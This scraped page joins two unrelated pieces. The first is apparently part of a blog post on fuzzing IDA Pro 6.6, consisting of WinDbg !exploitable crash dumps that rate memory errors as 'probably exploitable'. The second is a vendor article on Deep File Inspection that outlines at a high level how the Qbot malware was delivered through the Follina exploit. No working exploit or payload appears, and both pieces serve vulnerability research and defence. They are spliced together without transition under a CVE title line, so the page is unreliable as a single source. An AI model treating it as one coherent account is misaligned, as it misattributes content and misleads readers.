Minor       : SYSFER+0x45b1b  
Minor       : SYSFER+0x45b1b  
Minor       : SYSFER+0x45a1c  
Instruction Address: 0x0000000077559dbd

Description: Data from Faulting Address controls subsequent Write Address  
Short Description: TaintedDataControlsWriteAddress  
Exploitability Classification: PROBABLY\_EXPLOITABLE  
Recommended Bug Title: Probably Exploitable - Data from Faulting Address controls subsequent Write Address starting at msvcrt!malloc+0x00000000000000cf called from dbghelp!StackWalk64+0x0000000000001bba (Hash=0xa95bda97.0x1ca78871)

The data from the faulting address is later used as the target for a later write.  
ChildEBP RetAddr  Args to Child                
WARNING: Stack unwind information not available. Following frames may be wrong.  
0025bb3c 679a5b61 0025be54 06bac1e0 0000001c msvcrt!malloc+0xcf  
0025bb50 679a1059 08250ba8 00000000 06790000 dbghelp!StackWalk64+0x1bba  
0025befc 679c8036 08250ba8 00000002 00000000 dbghelp!SymGetModuleInfoW64+0x549  
0025bf14 679a6a2c 08250ba8 4794d435 00000000 dbghelp!FindExecutableImage+0x80e  
0025c3a4 679a6ca6 beeffeed 0824b518 00400000 dbghelp!StackWalk64+0x2a85  
0025c808 679c3a0e beeffeed 0824b430 00000000 dbghelp!StackWalk64+0x2cff  
0025c868 679c3aa4 beeffeed 00000000 0824b430 dbghelp!SymLoadModuleEx+0x44  
0025c894 6a26a8d7 beeffeed 00000000 033aa130 dbghelp!SymLoadModule64+0x23  
0025c968 6677515a 00000001 00000010 03359768 pdb+0x1a8d7  
0025cbf0 70ce8277 03359768 0000004a 00000001 IDA!run\_plugin+0x3a  
0025cc20 70ce9f2f 6689f840 00000000 4795787b dbg+0x8277  
0025cc44 753d5b1b 00000006 753d5b1b fffffffe dbg+0x9f2f  
0025cc4c 753d5b1b fffffffe 0333aa21 47653451 SYSFER+0x45b1b  
0025cc84 753d5a1c 00000006 47653425 0000000f SYSFER+0x45b1b  
0025ccfc 00000000 00100000 00001000 00000000 SYSFER+0x45a1c  
eax=06bac1fc ebx=08250ba8 ecx=00000007 edx=00000000 esi=06bac1e0 edi=0025be54  
eip=77559dbd esp=0025bb34 ebp=0025bb3c iopl=0         nv up ei ng nz ac pe cy  
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010297  
msvcrt!malloc+0xcf:  
77559dbd 8b448ee4        mov     eax,dword ptr \[esi+ecx\*4-1Ch\] ds:0023:06bac1e0=????????

  

\---<cut>---

Another variant below.

**Case #03:**

\---<cut>---

(...)  
Microsoft (R) Windows Debugger Version 6.11.0001.404 X86  
Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: "C:\\Program Files\\IDA 6.6\\idaq.exe" -B -A -a- -c C:\\FOE2\\fuzzdir\\campaign\_egm\_o8\\iteration\_j1fril\\foe-crash-oxqtdm\\sf\_76ffd62a1f8250f56b56d8aa211b31a9-252  
(...)  
Executable search path is:  
ModLoad: 000f0000 00403000   idaq.exe  
(...)  
ModLoad: 69020000 6904c000   C:\\Program Files\\IDA 6.6\\loaders\\macho.ldw  
(1594.1f2c): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=03b8bba0 ebx=0a00001c ecx=02800007 edx=00000000 esi=f9b8bb84 edi=086a0020  
eip=68ee1ed7 esp=0050d234 ebp=0050d23c iopl=0         nv up ei pl nz ac pe nc  
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216  
MSVCR100!memcpy+0x57:  
68ee1ed7 f3a5            rep movs dword ptr es:\[edi\],dword ptr \[esi\]

0:000> r;r;!exploitable -v;kb;r;q  
eax=03b8bba0 ebx=0a00001c ecx=02800007 edx=00000000 esi=f9b8bb84 edi=086a0020  
eip=68ee1ed7 esp=0050d234 ebp=0050d23c iopl=0         nv up ei pl nz ac pe nc  
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216  
MSVCR100!memcpy+0x57:  
68ee1ed7 f3a5            rep movs dword ptr es:\[edi\],dword ptr \[esi\]  
eax=03b8bba0 ebx=0a00001c ecx=02800007 edx=00000000 esi=f9b8bb84 edi=086a0020  
eip=68ee1ed7 esp=0050d234 ebp=0050d23c iopl=0         nv up ei pl nz ac pe nc  
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216  
MSVCR100!memcpy+0x57:  
68ee1ed7 f3a5            rep movs dword ptr es:\[edi\],dword ptr \[esi\]

!exploitable 1.6.0.0  
HostMachine\\HostUser  
Executing Processor Architecture is x86  
Debuggee is in User Mode  
Debuggee is a live user mode debugging session on the local machine  
Event Type: Exception  
Exception Faulting Address: 0xfffffffff9b8bb84  
First Chance Exception Type: STATUS\_ACCESS\_VIOLATION (0xC0000005)  
Exception Sub-Type: Read Access Violation

Faulting Instruction:68ee1ed7 rep movs dword ptr es:\[edi\],dword ptr \[esi\]

Exception Hash (Major/Minor): 0x37d7dcd9.0xba787c31

 Hash Usage : Stack Trace:  
Major+Minor : MSVCR100!memcpy+0x57  
Major+Minor : macho+0xd468  
Major+Minor : macho+0x106e9  
Instruction Address: 0x0000000068ee1ed7

Description: Read Access Violation on Block Data Move  
Short Description: ReadAVonBlockMove  
Exploitability Classification: PROBABLY\_EXPLOITABLE  
Recommended Bug Title: Probably Exploitable - Read Access Violation on Block Data Move starting at MSVCR100!memcpy+0x0000000000000057 (Hash=0x37d7dcd9.0xba787c31)

This is a read access violation in a block data move, and is therefore classified as probably exploitable.  
ChildEBP RetAddr  Args to Child                
WARNING: Stack unwind information not available. Following frames may be wrong.  
0050d23c 6902d468 086a0020 f9b8bb84 0a00001c MSVCR100!memcpy+0x57  
0050d26c 690306e9 f9b8bb84 0a00001c 6dc29131 macho+0xd468  
00000000 00000000 00000000 00000000 00000000 macho+0x106e9  
eax=03b8bba0 ebx=0a00001c ecx=02800007 edx=00000000 esi=f9b8bb84 edi=086a0020  
eip=68ee1ed7 esp=0050d234 ebp=0050d23c iopl=0         nv up ei pl nz ac pe nc  
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216  
MSVCR100!memcpy+0x57:  
68ee1ed7 f3a5            rep movs dword ptr es:\[edi\],dword ptr \[esi\]

  

\---<cut>---

I think it should be enough to start your own 'Night Fuzzing Session' ;)

"Probably" _nihil novi_ here... ;>  

 

... "but" maybe you'll find it useful. ;)  

If you'll have any questions or comments \- feel free to ping me.

Have a nice weekend! 

Cheers

CVE-2022-32441: Night fuzzing session - IdaPro 6.6 - part 2

When examining the modern threat landscape, empowering your security operations and overcoming the limitations inherent with other malware prevention solutions is imperative.

The implementation of defense-in-depth architectures and operating system hardening technologies have altered the threat landscape. Historically, zero-click, singular vulnerabilities were commonly discovered and exploited. The modern-day defensive posture requires attackers to successfully chain together multiple exploit techniques to gain control of a target system. The increased utilization of dynamic analysis systems has driven attackers to evade detection by requiring input or action from the user. Sometimes, the victim must perform several manual steps before the underlying payload is activated. Otherwise, it remains dormant and undetectable through behavioral analysis.

It is well known that client-side attacks are the predominant access vector for most initial access. Web browser and email-based malware campaigns target users through phishing, social engineering, and exploitation. Productivity and business tools from vendors like Adobe and Microsoft are widespread and provide attackers with many options. Combining the lack of security awareness training and well-developed social engineering tactics frequently results in users permitting the execution of malicious embedded logic like weaponized macros or other scripts. Analysis of these common malware carriers is time-consuming and tedious, and it requires expert skills. To adequately prevent, detect, and respond to these threats, an organization must throw everything at the problem and augment this previously human-intensive process.

Deep File Inspection (DFI) is one approach to ease the burden associated with continuous security monitoring. DFI is a static-analysis engine that inspects beyond Layer 7 of the OSI model, essentially automating the work of your typical SOC analyst or security researcher. Regardless of the complexity of evasive techniques a threat actor utilizes, DFI dissects malicious carriers to expose embedded logic, semantic context, and metadata. Coercive graphical lures are extracted and processed through a machine vision layer, adding to the semantic context of the original file. Commonly used obfuscation methods and encoding mechanisms are automatically discovered and deciphered.

A public concern that SOC analysts, IR teams, and security researchers encounter is the limited availability of context for detection analytics. In the case of intrusion prevention systems, resources are limited to microseconds of time and kilobytes of analyzable data. Intrusion detection systems can typically dig deeper, taking additional milliseconds to expose further data.

Regarding the time-analysis trade-off, the next step up is behavioral monitoring or sandboxed execution. This class of solutions detonates samples in a virtualized environment and annotates the system's behavior for threat detection; this process is both compute- and time-intensive, taking minutes to analyze each file. There is a middle ground where a few additional seconds can provide previously unseen detection opportunities.  

**Use Case: Qbot Malware Delivered via Follina and Malspam**

An example of an evasive threat is the recent TA570 campaigns that delivered Qbot malware with thread-hijacked emails. This wave of malspam utilized two different methods to provide the payload. The first method used a shortcut LNK to run a DLL with the hidden attribute. The second method is a Word document using the Follina (CVE-2022-30190) exploit.

    

Figure 2. Recent Qbot threat sequence. Source: InQuest

The attached HTML file contains an antiquated JS function to convert the embedded base64 string into a zip archive and prompt the victim to download. When extracted, the zip file contains a disk image that will be mounted showing either a shortcut or the shortcut and word document. The shortcut will execute the Qbot DLL within the directory with the hidden attribute set. At the same time, the Word file will attempt to exploit the MSDT vulnerability and download the payload from a remote server.

It is challenging for many solutions to carve the zip archive from the encoded HTML, extract the IMG file, and identify the weaponized contents. In this example, multiple threat signatures are seen from ambiguities within the SMTP headers, down to the hidden DLL or Follina document.

    

Figure 3. Variety of signatures alerts. Source: InQuest

Another interesting approach for detection is the concept of retrospective analysis or RetroHunting. While DFI creates a new dimension of data, RetroHunting provides a new dimension of time for analyzing historical events. The appearance of Follina and other zero-day vulnerabilities illustrates the usefulness of this capability by facilitating the detection of previously unseen alerts with emerging threat intelligence and detection logic.

In addition to a library of predeveloped signatures, analysts can develop user-defined YARA rules to combine strings, bytes patterns, and regular expressions via flexible conditional logic.

When confronted with novel attack techniques being encountered in the wild, security leaders must provide an opportunity to empower your detection operations and overcome the limitations inherent with other malware prevention solutions. A free resource to test the efficacy of a mail provider's security controls is the Email Security Assessment.

**About the Author**

    

Josiah Smith has almost a decade of experience in the realm of security. Before becoming a threat engineer, Josiah worked as a cyber operator, overseeing signature management and host-based detection programs. He spent several years in a room without windows, focusing on network detection, threat hunting, and IR investigations. He began his career as a member of the US Air Force, and most of his experience is with the DoD.

Tag

#windows